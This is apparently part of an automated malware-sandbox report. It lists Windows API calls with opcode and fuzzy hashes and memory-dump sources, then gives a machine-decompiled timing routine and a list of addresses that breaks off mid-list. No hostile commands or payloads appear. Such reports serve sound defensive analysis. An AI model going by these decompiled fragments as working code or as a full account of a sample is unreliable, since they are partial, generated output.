                                                                                • Opcode ID: 40adabf507c751fdfd73309a4fa1b4349453d4c5581e881346e68493848c6e22
                                                                                • Instruction ID: d16106fe87b688a08022d4be92e53a49c9d60251d7fe9e5c18dc4e6162ca585d
                                                                                • Opcode Fuzzy Hash: 40adabf507c751fdfd73309a4fa1b4349453d4c5581e881346e68493848c6e22
                                                                                • Instruction Fuzzy Hash: 59217C31600300EFDB28AF45D844B6B77B4FF49756F10946EE9428B2A1C7B5ED40CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044DD68,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E35
                                                                                • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E47
                                                                                • LeaveCriticalSection.KERNEL32(0044DD68,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E50
                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3,0042E17A), ref: 00431E62
                                                                                  • Part of subcall function 00431D67: GetVersion.KERNEL32(?,00431E0A,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3,0042E17A,0042F3B4), ref: 00431D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                • String ID:
                                                                                • API String ID: 1193629340-0
                                                                                • Opcode ID: 4e205e9bb6b3dcc8dd5cce6a02d651efcdf2b37db0e3c7855d7b58d282c8f6a3
                                                                                • Instruction ID: f30bbc8a28ee305a10e4a77cda31fc97308d25c01f79dd550269c059025d1f6a
                                                                                • Opcode Fuzzy Hash: 4e205e9bb6b3dcc8dd5cce6a02d651efcdf2b37db0e3c7855d7b58d282c8f6a3
                                                                                • Instruction Fuzzy Hash: FCF04F75D0020EDFDB209F55EC84967F36DFB1A357F502037E60682021D735A555CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D45
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D4D
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D55
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D5D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalInitializeSection
                                                                                • String ID:
                                                                                • API String ID: 32694325-0
                                                                                • Opcode ID: afe9d4007deb1f416a06173725f0cbce68a784d4e2597176090283cc0ffeddde
                                                                                • Instruction ID: 07a823e33baaf15187b4ba837c5d0c6c4986aa2782f6b83b8401a2c697d611cf
                                                                                • Opcode Fuzzy Hash: afe9d4007deb1f416a06173725f0cbce68a784d4e2597176090283cc0ffeddde
                                                                                • Instruction Fuzzy Hash: 44C00279818078AADF123B65FC0485A3FAEEB263A13258077E508520308B229C20EFD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                                • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                                                                                • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                                • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                                • Instruction ID: 21c54deca697b2ded1517e8e1738f7315810da786e900ad234c2aa2cb91c91dc
                                                                                • Opcode Fuzzy Hash: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                                • Instruction Fuzzy Hash: DA90027120100413D222616945047070009E7D0382F91C422A4414558D96A68996F161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                                • Instruction ID: 41887b8759142fbb3d7f1feb8a98236d473b17719def4235c2a79c670be888c7
                                                                                • Opcode Fuzzy Hash: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                                • Instruction Fuzzy Hash: 17900261242041535656B16944045074006F7E0382791C022A5404950C8576989AE661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                                • Instruction ID: 1feb496b191fc441b15c9f44a378969dd7f4dd2a3fa43bc79c875e267a888c90
                                                                                • Opcode Fuzzy Hash: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                                • Instruction Fuzzy Hash: 3B9002A134100443D21161694414B060005E7E1342F51C025E5054554D8669CC96B166
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                                • Instruction ID: cd18590575c2b322f46f28179e48b638b62d154e3f57e717e1138a8122dace73
                                                                                • Opcode Fuzzy Hash: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                                • Instruction Fuzzy Hash: 2B9002B120100403D251716944047460005E7D0342F51C021A9054554E86A98DD9B6A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                                • Instruction ID: 395bf6263286ad70b641d49cb16516253b58af2615c1288a40097d6e6d3034c8
                                                                                • Opcode Fuzzy Hash: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                                • Instruction Fuzzy Hash: C3900261601000434251717988449064005FBE1352751C131A4988550D85A988A9A6A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                                • Instruction ID: a6f67a8277a3b3be8b89b917850b13e78702fe5dd5bedc71adf87a0afe52c33f
                                                                                • Opcode Fuzzy Hash: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                                • Instruction Fuzzy Hash: 8490027120140403D2116169481470B0005E7D0343F51C021A5154555D86758895B5B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                                • Instruction ID: 64d2cfaf13f9309bcd7403859deaf896cc2873968d7599671b0a295e5d50db3c
                                                                                • Opcode Fuzzy Hash: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                                • Instruction Fuzzy Hash: FC90026121180043D31165794C14B070005E7D0343F51C125A4144554CC96588A5A561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                                • Instruction ID: 08c33894a5ed7cb2586842ca04486c4597f6e0c3905499bcde100bcd11c8e5f2
                                                                                • Opcode Fuzzy Hash: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                                • Instruction Fuzzy Hash: 0D9002A120200003421671694414616400AE7E0342B51C031E5004590DC57588D5B165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                                • Instruction ID: 1315aa69fdc5ae92524b7a957cf78082d5d3c7872c89ceafb40b3329d7236b15
                                                                                • Opcode Fuzzy Hash: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                                • Instruction Fuzzy Hash: 75900265211000030216A56907045070046E7D5392351C031F5005550CD67188A5A161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                                • Instruction ID: f1994b6a4f452d4f91f2f1e37c547d66f4cd1f9836b374957a5211878604265d
                                                                                • Opcode Fuzzy Hash: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                                • Instruction Fuzzy Hash: 0890027120108803D2216169840474A0005E7D0342F55C421A8414658D86E588D5B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                                • Instruction ID: 82818c37d7a7e9e8cb6d625da2237b27d33e1dddfe8bbaa70537b02e9c407086
                                                                                • Opcode Fuzzy Hash: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                                • Instruction Fuzzy Hash: 3F90027120100803D2917169440464A0005E7D1342F91C025A4015654DCA658A9DB7E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                                • Instruction ID: 39b11731bdff199837e062ce116313473b0146bb55da1fdd5054dad37b832a5f
                                                                                • Opcode Fuzzy Hash: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                                • Instruction Fuzzy Hash: 7690026130100003D251716954186064005F7E1342F51D021E4404554CD965889AA262
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                                                                                • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                                                                                • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                                                                                • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                                                                                • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 66%
                                                                                			E00A36A60(intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				char _v24;
                                                                                				signed char _v25;
                                                                                				intOrPtr* _v32;
                                                                                				signed char _v36;
                                                                                				signed int _v40;
                                                                                				intOrPtr* _v44;
                                                                                				char _v48;
                                                                                				intOrPtr _v52;
                                                                                				char _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr* _v68;
                                                                                				signed char _v72;
                                                                                				signed char _v76;
                                                                                				intOrPtr _v80;
                                                                                				intOrPtr _v84;
                                                                                				signed char _v88;
                                                                                				signed int _v92;
                                                                                				signed char _v96;
                                                                                				char _v100;
                                                                                				signed int _v104;
                                                                                				void* _v116;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr* _t101;
                                                                                				void* _t105;
                                                                                				signed int _t112;
                                                                                				signed int* _t113;
                                                                                				signed int* _t114;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t118;
                                                                                				void* _t122;
                                                                                				signed int _t127;
                                                                                				intOrPtr* _t128;
                                                                                				signed int _t131;
                                                                                				signed char _t134;
                                                                                				signed int _t136;
                                                                                				intOrPtr* _t138;
                                                                                				intOrPtr* _t139;
                                                                                				intOrPtr _t143;
                                                                                				signed char _t144;
                                                                                				signed short _t145;
                                                                                				signed char _t146;
                                                                                				intOrPtr* _t147;
                                                                                				intOrPtr _t148;
                                                                                				void* _t150;
                                                                                				char _t152;
                                                                                				signed int _t153;
                                                                                				signed char _t154;
                                                                                
                                                                                				_v8 =  *0xafd360 ^ _t153;
                                                                                				_t144 =  *0x7ffe03c6;
                                                                                				_v25 = _t144;
                                                                                				_t128 = _a4;
                                                                                				_v44 = _t128;
                                                                                				if((_t144 & 0x00000001) == 0) {
                                                                                					L54:
                                                                                					_push(0);
                                                                                					_push( &_v100);
                                                                                					E00A49810();
                                                                                					 *_t128 = _v100;
                                                                                					 *(_t128 + 4) = _v96;
                                                                                					goto L20;
                                                                                				} else {
                                                                                					do {
                                                                                						_t148 =  *0x7ffe03b8;
                                                                                						_t134 =  *0x7FFE03BC;
                                                                                						_t146 =  *0x7FFE03BC;
                                                                                						_v60 = _t148;
                                                                                						_v76 = _t134;
                                                                                					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
                                                                                					_t128 = _v44;
                                                                                					if((_t144 & 0x00000002) != 0) {
                                                                                						_t147 =  *0xaf6908; // 0x0
                                                                                						_v68 = _t147;
                                                                                						if(_t147 == 0) {
                                                                                							goto L54;
                                                                                						} else {
                                                                                							goto L22;
                                                                                						}
                                                                                						while(1) {
                                                                                							L22:
                                                                                							_t101 =  *_t147;
                                                                                							_v32 = _t101;
                                                                                							if(_t101 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							if(_t144 >= 0) {
                                                                                								if((_t144 & 0x00000020) == 0) {
                                                                                									if((_t144 & 0x00000010) != 0) {
                                                                                										asm("mfence");
                                                                                									}
                                                                                								} else {
                                                                                									asm("lfence");
                                                                                								}
                                                                                								asm("rdtsc");
                                                                                							} else {
                                                                                								asm("rdtscp");
                                                                                								_v72 = _t134;
                                                                                							}
                                                                                							_v52 = _t101;
                                                                                							_v84 =  *((intOrPtr*)(_t147 + 8));
                                                                                							_v64 =  *((intOrPtr*)(_t147 + 0x10));
                                                                                							_v80 =  *((intOrPtr*)(_t147 + 0x14));
                                                                                							_t105 = E00A4CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                                							_t146 = _t144;
                                                                                							E00A4CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                                							_t150 = _t105 + _t144;
                                                                                							_t144 = _v25;
                                                                                							asm("adc edi, 0x0");
                                                                                							_v40 = _t150 + _v64;
                                                                                							_t147 = _v68;
                                                                                							asm("adc edi, [ebp-0x4c]");
                                                                                							_v36 = _t146;
                                                                                							if( *_t147 != _v32) {
                                                                                								continue;
                                                                                							} else {
                                                                                								_t128 = _v44;
                                                                                								_t147 = _v60;
                                                                                								L19:
                                                                                								_t144 = _v36;
                                                                                								asm("adc edx, [ebp-0x48]");
                                                                                								 *_t128 = E00A4D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
                                                                                								 *(_t128 + 4) = _t144;
                                                                                								L20:
                                                                                								return E00A4B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
                                                                                							}
                                                                                						}
                                                                                						_t128 = _v44;
                                                                                						goto L54;
                                                                                					}
                                                                                					_v56 = 0xffffffff;
                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
                                                                                						_t136 = 0x14c;
                                                                                						L14:
                                                                                						_t112 = _t136 & 0x0000ffff;
                                                                                						L15:
                                                                                						if(_t112 == 0xaa64) {
                                                                                							_t113 =  &_v40;
                                                                                							_v32 = _t113;
                                                                                							_t138 = _v32;
                                                                                							asm("int 0x81");
                                                                                							 *_t138 = _t113;
                                                                                							 *(_t138 + 4) = _t144;
                                                                                							if((_t144 & 0x00000040) == 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							_t114 =  &_v92;
                                                                                							_v32 = _t114;
                                                                                							_t139 = _v32;
                                                                                							asm("int 0x81");
                                                                                							 *_t139 = _t114;
                                                                                							 *(_t139 + 4) = _t144;
                                                                                							_t144 = _v88;
                                                                                							if(((_t144 ^ _v36) & 0x00000001) != 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							_t112 = _v92;
                                                                                							L18:
                                                                                							_v40 = _t112;
                                                                                							_v36 = _t144;
                                                                                							goto L19;
                                                                                						}
                                                                                						if(_t144 >= 0) {
                                                                                							if((_t144 & 0x00000020) == 0) {
                                                                                								if((_t144 & 0x00000010) != 0) {
                                                                                									asm("mfence");
                                                                                								}
                                                                                							} else {
                                                                                								asm("lfence");
                                                                                							}
                                                                                							asm("rdtsc");
                                                                                						} else {
                                                                                							asm("rdtscp");
                                                                                						}
                                                                                						goto L18;
                                                                                					}
                                                                                					_t117 =  *[fs:0x18];
                                                                                					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
                                                                                					if(_t143 < 0) {
                                                                                						_t117 = _t117 + _t143;
                                                                                					}
                                                                                					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
                                                                                						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
                                                                                					} else {
                                                                                						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
                                                                                					}
                                                                                					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
                                                                                						L34:
                                                                                						_v48 = 0x10;
                                                                                						_push( &_v48);
                                                                                						_push(0x10);
                                                                                						_t146 =  &_v24;
                                                                                						_push(_t146);
                                                                                						_push(4);
                                                                                						_push( &_v56);
                                                                                						_push(0xb5);
                                                                                						_t122 = E00A4AA90();
                                                                                						if(_t122 == 0xc0000023) {
                                                                                							_t152 = _v48;
                                                                                							E00A4D000(_t152);
                                                                                							_t146 = _t154;
                                                                                							_push( &_v48);
                                                                                							_push(_t152);
                                                                                							_push(_t146);
                                                                                							_push(4);
                                                                                							_push( &_v56);
                                                                                							_push(0xb5);
                                                                                							_t122 = E00A4AA90();
                                                                                							_t147 = _v60;
                                                                                						}
                                                                                						if(_t122 < 0) {
                                                                                							_t112 = _v104;
                                                                                							_t144 = _v25;
                                                                                							goto L15;
                                                                                						} else {
                                                                                							_t145 =  *_t146;
                                                                                							_t136 = 0;
                                                                                							if(_t145 == 0) {
                                                                                								L43:
                                                                                								_t144 = _v25;
                                                                                								goto L14;
                                                                                							}
                                                                                							_t131 = 0;
                                                                                							do {
                                                                                								if((_t145 & 0x00040000) != 0) {
                                                                                									_t136 = _t145 & 0x0000ffff;
                                                                                								}
                                                                                								_t145 =  *(_t146 + 4 + _t131 * 4);
                                                                                								_t131 = _t131 + 1;
                                                                                							} while (_t145 != 0);
                                                                                							_t128 = _v44;
                                                                                							goto L43;
                                                                                						}
                                                                                					} else {
                                                                                						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
                                                                                						if(_t127 == 0) {
                                                                                							goto L34;
                                                                                						}
                                                                                						_t136 = _t127;
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                			}






















































                                                                                0x00a36a6f
                                                                                0x00a36a72
                                                                                0x00a36a78
                                                                                0x00a36a7c
                                                                                0x00a36a7f
                                                                                0x00a36a87
                                                                                0x00a78049
                                                                                0x00a78049
                                                                                0x00a7804e
                                                                                0x00a7804f
                                                                                0x00a78057
                                                                                0x00a7805c
                                                                                0x00000000
                                                                                0x00a36a8d
                                                                                0x00a36a92
                                                                                0x00a36a92
                                                                                0x00a36a94
                                                                                0x00a36a99
                                                                                0x00a36a9c
                                                                                0x00a36a9f
                                                                                0x00a36aa2
                                                                                0x00a36aaa
                                                                                0x00a36ab0
                                                                                0x00a77eae
                                                                                0x00a77eb4
                                                                                0x00a77eb9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00a77ebf
                                                                                0x00a77ebf
                                                                                0x00a77ebf
                                                                                0x00a77ec1
                                                                                0x00a77ec6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00a77ece
                                                                                0x00a77edb
                                                                                0x00a77ee5
                                                                                0x00a77ee7
                                                                                0x00a77ee7
                                                                                0x00a77edd
                                                                                0x00a77edd
                                                                                0x00a77edd
                                                                                0x00a77eea
                                                                                0x00a77ed0
                                                                                0x00a77ed0
                                                                                0x00a77ed3
                                                                                0x00a77ed3
                                                                                0x00a77eec
                                                                                0x00a77ef8
                                                                                0x00a77f00
                                                                                0x00a77f07
                                                                                0x00a77f0a
                                                                                0x00a77f19
                                                                                0x00a77f1b
                                                                                0x00a77f23
                                                                                0x00a77f25
                                                                                0x00a77f28
                                                                                0x00a77f2e
                                                                                0x00a77f31
                                                                                0x00a77f34
                                                                                0x00a77f37
                                                                                0x00a77f3c
                                                                                0x00000000
                                                                                0x00a77f3e
                                                                                0x00a77f3e
                                                                                0x00a77f41
                                                                                0x00a36b35
                                                                                0x00a36b38
                                                                                0x00a36b44
                                                                                0x00a36b4c
                                                                                0x00a36b4e
                                                                                0x00a36b51
                                                                                0x00a36b69
                                                                                0x00a36b69
                                                                                0x00a77f3c
                                                                                0x00a78046
                                                                                0x00000000
                                                                                0x00a78046
                                                                                0x00a36abc
                                                                                0x00a36aca
                                                                                0x00a77f49
                                                                                0x00a36b13
                                                                                0x00a36b13
                                                                                0x00a36b16
                                                                                0x00a36b1e
                                                                                0x00a77fe7
                                                                                0x00a77fea
                                                                                0x00a77fed
                                                                                0x00a77ff0
                                                                                0x00a77ff2
                                                                                0x00a77ff4
                                                                                0x00a77ffa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00a78000
                                                                                0x00a78003
                                                                                0x00a78006
                                                                                0x00a78009
                                                                                0x00a7800b
                                                                                0x00a7800d
